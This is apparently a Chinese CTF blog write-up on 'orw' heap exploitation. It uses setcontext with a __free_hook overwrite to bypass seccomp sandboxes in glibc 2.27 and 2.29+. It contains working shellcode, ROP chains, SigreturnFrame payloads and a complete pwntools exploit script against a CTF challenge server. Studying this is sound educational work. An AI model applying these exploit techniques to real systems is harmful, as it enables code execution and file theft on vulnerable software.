【pwn】orw

最新推荐文章于 2024-08-04 10:59:25 发布
最新推荐文章于 2024-08-04 10:59:25 发布
阅读量1.7k 收藏 8
点赞数 1
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43960998/article/details/115838190
版权

本文分为两部分,一部分是2.27及一下的 setcontext + orw,一部分是 2.29 及以上的 setcontext + orw。

利用条件

2.27:

  • 开了沙箱
  • uaf 等控制 free_hook
一、2.27

libc 2.27及以下的 setcontext:
在这里插入图片描述
给各寄存器传参分别由 rdi 来完成,一般的套路是线泄漏 libc 和 heap_base,我们把某一个 chunk 填充为:

frame = SigreturnFrame()
frame.rsp = libc.sym['__free_hook']+0x10
frame.rdi = newexe
frame.rsi = 0x1000
frame.rdx = 4 | 2 | 1
frame.rip = libc.sym['mprotect']

具体堆中:
在这里插入图片描述
通过 tcache double 等方式申请到 free_hook 将其覆写为 setcontext + 53:

newexe = libc.sym['__free_hook'] & 0xfffffffffffff000
context.arch = 'amd64'
shell1 = '''
xor rdi,rdi
mov rsi,%d
mov edx,0x1000

mov eax,0
syscall

jmp rsi
''' % newexe
add(0x10,p64(heap_base+0xd80))
add(0x10,p64(libc.sym["__free_hook"])*2)

add(0x120,'a')
payload = p64(libc.sym['setcontext']+53) + p64(libc.sym['__free_hook']+0x18)*2 + asm(shell1)
add(0x120,payload)

在这里插入图片描述
然后后续按照 payload 分配,此时 free 上面布置好 frame 的 chunk,当堆管理器检测到 free_hook 不为空时就会去执行,那就是相当于要执行 setcontext + 53,因为 free(ptr) ,其中 rdi 为 ptr,而setcontext + 53 又是根据 ptr 来为各寄存器赋值,所以此时达成了控制程序执行流的目的,当执行到 push rcx 之前:
在这里插入图片描述
此时均指向了我们想要执行的位置,执行 push rcx 后:
在这里插入图片描述
在这里插入图片描述
因为现在栈现在迁移到 0x8f8 处,push 后将 mprotect 函数地址置于栈顶,接下来继续执行,控制完寄存器,最后执行 ret 时会把 push 进去的 rcx 也就是 mprotect 的地址弹给 rip 去执行:
在这里插入图片描述
在这里插入图片描述
执行完 mprotect 后 pop rip 布置好的 shellcode 地址:
在这里插入图片描述
去执行 shell1,继续向刚才覆写权限的区域读取 orw 的shellcode:

shell2 = '''
mov rax,0x67616c66
push rax

mov rdi,rsp
mov rsi,0
mov rdx,0
mov rax,2
syscall

mov rdi,rax
mov rsi,rsp
mov rdx,1024
mov rax,0
syscall

mov rdi,1
mov rsi,rsp
mov rdx,rax
mov rax,1
syscall

mov rdi,0
mov rax,60
syscall
'''

然后在 shell1 的最后 jmp 到此处执行 orw:
在这里插入图片描述
在这里插入图片描述
最终读取到 flag:
在这里插入图片描述
此题为 2020 dasctf 6月的 oooorder.

所以 2.27 下,最核心的利用的点就是 free 时 rdi 为堆地址,通过在堆中的偏移来控制各寄存器,在泄漏了堆地址的题目中,我们也可以把栈迁移到堆上来,在 frame 的 rsp 位置和 rip 的位置分别布置 fake_rsp 也就是第二次执行的位置,rip 布置为 ret,相当于弹栈,原本一次 ret,又执行一次,一共两次弹栈,恰好把 shellcode 地址弹给 rip,接着在堆上布置 orw,读 flag:

fake_rsp = heap_base + 0x1d80
ret = libc_base + 0x00000000000008aa # ret
pop_rdi_ret = libc_base + 0x000000000002155f # pop rdi ; ret
pop_rsi_ret = libc_base + 0x0000000000023e6a # pop rsi ; ret 
pop_rdx_rsi_ret = libc_base + 0x00000000001306d9 # pop rdx ; pop rsi ; ret
pop_rdx_ret = libc_base + 0x0000000000001b96 # pop rdx ; ret

p = 'a'*0xa0 + p64(fake_rsp) + p64(ret) #rsp  rip
p = p.ljust(0xb0, '\x00')
p += './flag\x00\x00'
p += p64(0)
p += p64(pop_rdi_ret) + p64(flag)
p += p64(pop_rsi_ret) + p64(0)
p += p64(libc_base+libc.sym['open'])
p += p64(pop_rdi_ret) + p64(3)
p += p64(pop_rdx_rsi_ret) + p64(0x30) + p64(fake_rsp+0x100)
p += p64(libc_base + libc.sym['read'])
p += p64(pop_rdi_ret) + p64(1)
p += p64(pop_rdx_rsi_ret) + p64(0x30) + p64(fake_rsp+0x100)
p += p64(libc_base + libc.sym['write'])
add(0x400, p)#10
free(10)

第二种就相对简单了。

2.29

2.29 下,setcontext 赋值的 rdi 变成了 rdx:
在这里插入图片描述
那此时就需要一个 gadget 来控制 rdx,通常是下面这个 gadget:

ropper -f ../share/ctf-pwn/libc/libc6_2.29-0ubuntu2_amd64.so --search 'mov rdx'

0x000000000012be97: mov rdx, qword ptr [rdi + 8]; mov rax, qword ptr [rdi]; mov rdi, rdx; jmp rax;

scanf读取到换行符,read 则不用

2.30
> ropper -f ../share/ctf-pwn/libc/libc6_2.30-0ubuntu2.2_amd64.so --search "mov rdx"
0x0000000000154b20: mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];

rdi 此时为当前 chunk 地址,rdi + 8 应该存放 fake_frame 的地址,此时 rdx 指向了 fake_frame,最后 call [rdx + 0x20] = call &fake_frame + 0x20 = call (libc_base + libc.sym[’__free_hook’] + 0x30) = call
p64(libc_base + libc.sym[‘setcontext’] + 61),然后完成一系列寄存器的控制,frame 的前 0x28 个字节没用,前面填充完直接从 frame[0x28:] 开始。
LittleRedFlower

#coding=utf-8
from pwn import *

# libc=ELF("/home/newf1rst/share/ctf-pwn/libc/libc6_2.27-3ubuntu1.2_amd64.so")
# libc = elf.libc
libc = ELF("./libc.so.6")
# io = process("./pwn.bak")
io = remote("node3.buuoj.cn", 29518)

context.log_level = 'debug'
context.arch='amd64'

def dbg():
    gdb.attach(io)
    pause()
    
io.recvuntil("GIFT: 0x")
libc_base = int(io.recvuntil("\n",drop=True), 16) - libc.sym['_IO_2_1_stdout_']
print("libc_base -> ", hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']

io.recvuntil("You can write a byte anywhere")
# tcache_max_bins = libc_base + libc.sym['obstack_exit_failure']-0x20
io.send(p64(libc_base + 0x1ea2d0 + 0x7))
io.recvuntil("And what?")
io.send('\xff')
io.sendlineafter("Offset:", str(0x880))
io.sendafter("Content:", p64(free_hook))
# gdb.attach(io, "b free \n c")
io.sendafter("size:", str(0x1530))

# pop_rdi_addr = libc_base + 0x0000000000021a62
# pop_rsi_addr = libc_base + 0x0000000000022432
# pop_rdx_addr = libc_base + 0x0000000000001b9a
pop_rdi_addr = libc_base + 0x0000000000026bb2
pop_rsi_addr = libc_base + 0x000000000002709c
pop_rdx_r12_addr = libc_base + 0x000000000011c3b1
ret = libc_base + 0x00000000000008aa
fake_frame_addr = libc_base + libc.sym['__free_hook'] + 0x10
frame = SigreturnFrame()
frame.rax = 0
frame.rdi = fake_frame_addr + 0xF8
frame.rsp = fake_frame_addr + 0xF8 + 0x10
frame.rip = libc.address + 0x00000000000256b9  # : ret
# frame.rip = ret
rop_data = [
    libc_base + libc.sym['open'],
    pop_rdx_r12_addr,
    0x100,
    0x0,
    pop_rdi_addr,
    3,
    pop_rsi_addr,
    fake_frame_addr + 0x200,
    libc_base + libc.sym['read'],
    pop_rdi_addr,
    fake_frame_addr + 0x200,
    libc_base + libc.sym['puts']
]

# local 0x0000000000150550 vn_libc:0x0000000000154b20
gadget = libc_base +  0x0000000000154b20
#0x0000000000154b20: mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
frame = str(frame).ljust(0xF8, '\x00')
payload = p64(gadget) + p64(fake_frame_addr) + '\x00' * 0x20 + p64(libc_base + libc.sym['setcontext'] + 61) + frame[0x28:] + "flag\x00\x00\x00\x00" + p64(0) + flat(rop_data)

io.sendafter('>>', payload)

io.interactive()
、皮皮鸭
关注
专栏目录
2024NKCTF-pwn
03-25
2024NKCTF_pwn
PWN · ORW | shellcode】[HGAME 2023 week1]simple_shellcode
Mr_Fmnwon的博客
01-04 722
注意,对于第一次输入的限制,这里刻意的打印了两种shellcode的长度。
pwn中沙盒保护之orw绕过
wangxunyu6的博客
03-09 1066
简单来说开启沙盒保护后execve被禁用,也就是说即使我们拿到shell也没有用。我们可以使用seccomp-tools dump指令进行查看。
[CTF]-PWNORW题型综合解析
最新发布
2301_79326813的博客
08-04 1067
这里使用mmap函数创造了一个内存映射区域从地址0x123000开始,大小位0x1000权限为可写可执行(可读0x1,可写0x2,可执行0x3)设置为私有映射()和匿名映射(MAP_SHAREDMAP_FIXEDMAP_LOCKED将要映射的文件描述符设为-1,表示不关联任何文件剩下的0指的就是偏移量了,没有偏移这里首先初始化将所有系统调用禁用,并且后面使用seccomp_rule_add函数添加了可使用的系统调用。根据64位系统调用号,分别是:read:系统调用号为0。
PWN题[强网先锋]orw超详细讲解(多解法)
am_03的博客
09-01 4429
知识点 构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖正常的返回地址。 \x00 截断符 shellcode里出现\x00就会从其截断,所以构造shellcode的时候要避免\x00 x64函数调用规则 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存
pwnable_orw-seccomp沙箱
个人笔记
04-11 743
但是,并不是所有的系统调用都被需要,而且不安全的代码滥用系统调用会对系统造成安全威胁。seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。还能调用o(open)/r(read)/w(write)功能,题目orw的提示就是这样来的!输出flag文件内容,sys_write(1,file,0x30);手动生成读取文件shellcode。
welpwn pwn 入门题
02-11
pwn 入门题
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
pwnable_orw
m0_58426698的博客
03-21 403
pwn的最经典的orw的题目,顺便学了一下手写汇编,对传参有了更深的理解
pwnorw&rop --泄露libc基址,orw
question55的博客
12-04 250
我们先看看程序的保护的情况因为题目提示了orw,我们可以沙箱检测一下可以发现是禁用的execve函数的,接着看函数逻辑这里格式化字符串漏洞可以泄露canary和puts函数地址,先确定一下参数位置可以发现参数是在第六个位置,接下来就是构造ROP,调用read函数读取shellcode到mmap开辟的地址就行,这里的gadget可以用题目给的libc.so.6进行寻找,exp如下:from pwn import *context(os='linux',arch='amd64',log_level='debug
2022强网拟态pwn wp
weixin_51480590的博客
11-18 526
这次比赛本人并没有参加,然后听说这次比赛比较简单,所以最近抽时间复现一波。由于本人web不太好,也并未涉及过webpwn,遂只复现mimic以及vm和两道堆题。
PWN刷题】Pwnable-Start、Pwnable-orw
QYbudong的博客
05-03 1552
③思路:打开文件sys_open('/home/orw/flag',0,0),读取文件sys_read(3,flag,0x100),写入标准输出sys_write(1,flag,0x30)。当然也可以用上边所说的,自己写汇编然后用asm生成shellcode,这种比较标准的函数还是建议用shellcraft,比较方便。这里解释一下,0x68732f6e和0x69622f2f组合在一起是hs/nib//,也就是binsh的小端序写法;而0xb,也就是11,是execve的系统调用号。入门级题目,保护全关。
pwn】[FSCTF 2023]Fi3h --orw利用,沙箱检测
question55的博客
11-19 209
【代码】【pwn】[FSCTF 2023]Fi3h --orw利用,沙箱检测。
【CTF】【PWNorw
m0_50819561的博客
10-09 1375
这是沙盒机制,就是限制你能使用的syscall。 seccomp-tools这个工具能快速地查出你能使用地syscall。 我们能使用的常用的构造攻击链的只有open,read,write。 但是因为限制了syscall,所以我们不能用特殊的系统调用getshell。 有两种方法,一种直接写汇编,一种利用shellcraft构造。 下面是汇编: ...
[BUUCTF-pwn]——pwnable_orw
半岛铁盒的博客
06-12 1385
记一次ORW的题目 orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 32位程序,开启了canary 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是 Linux kernel 从2.6.23版本引入的一种简洁的 sandbox
2.29leak off by null&&orw
qq_33590156的博客
12-04 2931
2.29版本下加了check,除了基本unlink检测还加上了判定presize和size相不相等的检测,这让之前的向前合并unlink夹chunk的思路变得不可行, 所以要利用就得结合fastbin smallbin largebin的残留指针,去构造unlink。 但这个题它可以直接leak堆上的残留指针,所以可以获取到heap地址,之后可以将heap指针(地址)p放在堆上构造fd = &p-0x18,bk = &p-0x10通过unlink检测 heap11_addr = heap_
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值